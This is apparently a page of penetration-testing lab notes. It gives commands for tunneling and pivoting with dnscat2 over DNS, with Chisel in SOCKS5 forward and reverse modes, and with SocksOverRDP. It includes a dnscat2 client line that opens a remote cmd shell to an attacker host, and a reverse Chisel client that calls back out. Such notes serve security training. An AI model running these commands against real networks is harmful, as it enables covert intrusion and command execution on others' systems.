Advanced Tunneling Methods

DNS Tunneling

# Start dnscat2 Server
sudo ruby dnscat2.rb --dns host=<tun0>,port=53,domain=inlanefreight.local --no-cache

# Import Module
Import-Module .\dnscat2.ps1

# Gain Connection
Start-Dnscat2 -DNSserver <tun0> -Domain i<domain> -PreSharedSecret <secret> -Exec cmd

# Interact With Session
windows -i <id>

SOCKS5 With Chisel

# Server Side
./chisel server -v -p 1234 --socks5

# Target 
./chisel client -v 10.129.202.64:1234 socks

# Now we can use proxychains
socks5 127.0.0.1 1080

Chisel Reverse Pivot

# Server Side
sudo ./chisel server --reverse -v -p 1234 --socks5

# Target Side
./chisel client -v 10.10.14.17:1234 R:socks

# cProxychains
socks5 127.0.0.1 1080

RDP & Socks Tunneling with SockOverRDP

# Load DLL
regsvr32.exe SocksOverRDP-Plugin.dll

# Proxifier
127.0.0.1:1080 over sock5

PreviousPivoting, Tunneling and Forwarding NextDynamic Port Forwarding (SSH + Socks)

Last updated 12 months ago